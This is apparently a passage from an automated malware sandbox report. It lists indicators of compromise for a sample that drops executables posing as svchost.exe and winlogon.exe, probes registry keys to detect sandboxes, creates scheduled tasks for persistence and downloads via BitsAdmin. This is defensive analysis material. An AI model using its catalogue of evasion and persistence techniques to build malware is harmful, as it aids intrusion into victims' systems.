File created | C:\Windows\System\xxx1.bak | oRqxkgsixdTQLGlCw_wScXlE.exe
File opened for modification | C:\Windows\Installer\MSI26C9.tmp | msiexec.exe
File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI3A04.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI768A.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI9D3F.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIA222.tmp | msiexec.exe
File opened for modification | C:\Windows\Tasks\SA.DAT | svchost.exe
File created | C:\Windows\System\xxx1.bak | svchost.exe
File created | C:\Windows\Downloaded Program Files\winlogon.exe | 4svaL_6jcYHnI8EWxQv_ARQo.exe
File opened for modification | C:\Windows\Installer\MSI8DCD.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI6CC3.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI72B1.tmp | msiexec.exe
File created | C:\Windows\Installer\f7710a1.msi | msiexec.exe
File created | C:\Windows\SystemTemp\~DF29210032494D28CF.TMP | msiexec.exe
File created | C:\Windows\SystemTemp\~DFE0AFE7E23CF134F9.TMP | msiexec.exe
File created | C:\Windows\System\svchost.exe | oRqxkgsixdTQLGlCw_wScXlE.exe
File opened for modification | C:\Windows\System\svchost.exe | oRqxkgsixdTQLGlCw_wScXlE.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 17 IoCs
Processes:
WerFault.exe (17 instances)
pid | pid_target | process | target process
1584 | 2744 | WerFault.exe | iWl5YE6jVqxWhmGtApNhDm2L.exe
1248 | 1888 | WerFault.exe | ZPIklAxPB6jR82sYubVd1wws.exe
2864 | 2840 | WerFault.exe | Vo5pWC9v4LM4GIuQjsgwgSyb.exe
3108 | 2912 | WerFault.exe | 0MCyp39H8AxiYTlGcyBfNoUC.exe
5756 | 3324 | WerFault.exe | KtMfKMTyGhGITYlVicMT552T.exe
4384 | 1320 | WerFault.exe | far1gFrhm6HTCSwt7AdHUaXK.exe
5692 | 1656 | WerFault.exe | YkJJP9hUDzrPj8CaQUtFkm4K.exe
2216 | 3004 | WerFault.exe | 6VJcPvgbLTEnL3gyVOmcMDK4.exe
496 | 4964 | WerFault.exe | rundll32.exe
2068 | 5720 | WerFault.exe | 981C.exe
5180 | 3964 | WerFault.exe | E7C5.exe
2324 | 13216 | WerFault.exe | GcleanerEU.exe
4572 | 2464 | WerFault.exe | GcleanerEU.exe
3716 | 4288 | WerFault.exe | gcleaner.exe
6236 | 4120 | WerFault.exe | gcleaner.exe
6348 | 6264 | WerFault.exe | rundll32.exe
7956 | 7584 | WerFault.exe | rundll32.exe
-
NSIS installer 4 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\Pictures\Adobe Films\mtbexzZhTysSDvFdfX8ZurDu.exe | nsis_installer_1
C:\Users\Admin\Pictures\Adobe Films\mtbexzZhTysSDvFdfX8ZurDu.exe | nsis_installer_2
C:\Users\Admin\Pictures\Adobe Films\mtbexzZhTysSDvFdfX8ZurDu.exe | nsis_installer_1
C:\Users\Admin\Pictures\Adobe Films\mtbexzZhTysSDvFdfX8ZurDu.exe | nsis_installer_2
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
1435.exe, G51K2QNgA1moFPDcsqFsEuBz.exe
description | ioc | process
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 1435.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | G51K2QNgA1moFPDcsqFsEuBz.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | G51K2QNgA1moFPDcsqFsEuBz.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | G51K2QNgA1moFPDcsqFsEuBz.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 1435.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 1435.exe
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exe, autosubplayer.exe, WerFault.exe, WerFault.exe, WerFault.exe, powershell.exe, WerFault.exe, WerFault.exe, build.exe, WerFault.exe, WerFault.exe, WerFault.exe, WerFault.exe, WerFault.exe, WerFault.exe, WerFault.exe, WerFault.exe, WerFault.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | autosubplayer.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | autosubplayer.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | powershell.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | autosubplayer.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | build.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | powershell.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | powershell.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | autosubplayer.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | powershell.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | autosubplayer.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | build.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | WerFault.exe
-
Creates scheduled task(s) 1 TTPs 14 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exe (14 instances)
pid | process
5632 | schtasks.exe
5464 | schtasks.exe
1428 | schtasks.exe
8240 | schtasks.exe
8500 | schtasks.exe
2796 | schtasks.exe
4804 | schtasks.exe
4548 | schtasks.exe
5588 | schtasks.exe
1452 | schtasks.exe
8436 | schtasks.exe
8676 | schtasks.exe
4980 | schtasks.exe
5400 | schtasks.exe
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exe
pid | process
5188 | timeout.exe
-
Download via BitsAdmin 1 TTPs 2 IoCs
-
Enumerates system info in registry 2 TTPs 37 IoCs
Processes:
WerFault.exe, powershell.exe, WerFault.exe, WerFault.exe, WerFault.exe, WerFault.exe, WerFault.exe, WerFault.exe, WerFault.exe, WerFault.exe, WerFault.exe, WerFault.exe, WerFault.exe, msedge.exe, WerFault.exe, autosubplayer.exe, WerFault.exe, WerFault.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | powershell.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | autosubplayer.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | autosubplayer.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | powershell.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
-
Kills process with taskkill 4 IoCs
Processes:
taskkill.exe (4 instances)
pid | process
1148 | taskkill.exe
4388 | taskkill.exe
5324 | taskkill.exe
9084 | taskkill.exe
-
Processes:
setup.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights | setup.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy | setup.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} | setup.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" | setup.exe
Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute | setup.exe
Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations | setup.exe
Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main\EnterpriseMode | setup.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" | setup.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" | setup.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" | setup.exe
Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge | setup.exe
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge | setup.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations\C:\Program Files (x86)\Microsoft\Edge\Application = "1" | setup.exe
Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main | setup.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\EnterpriseMode\MSEdgePath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | setup.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy | setup.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} | setup.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" | setup.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\94.0.992.50\\BHO" | setup.exe
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute | setup.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights | setup.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" | setup.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\94.0.992.50\\BHO" | setup.exe
Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration | setup.exe
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
MicrosoftEdgeUpdate.exe, MicrosoftEdgeUpdate.exe, setup.exe, msiexec.exe
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | MicrosoftEdgeUpdate.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%systemroot%\system32\FirewallControlPanel.dll,-12122 = "Windows Defender Firewall" | setup.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | MicrosoftEdgeUpdate.exe
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7 | msiexec.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | MicrosoftEdgeUpdate.exe
Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\7\52C64B7E | msiexec.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | MicrosoftEdgeUpdate.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | MicrosoftEdgeUpdate.exe
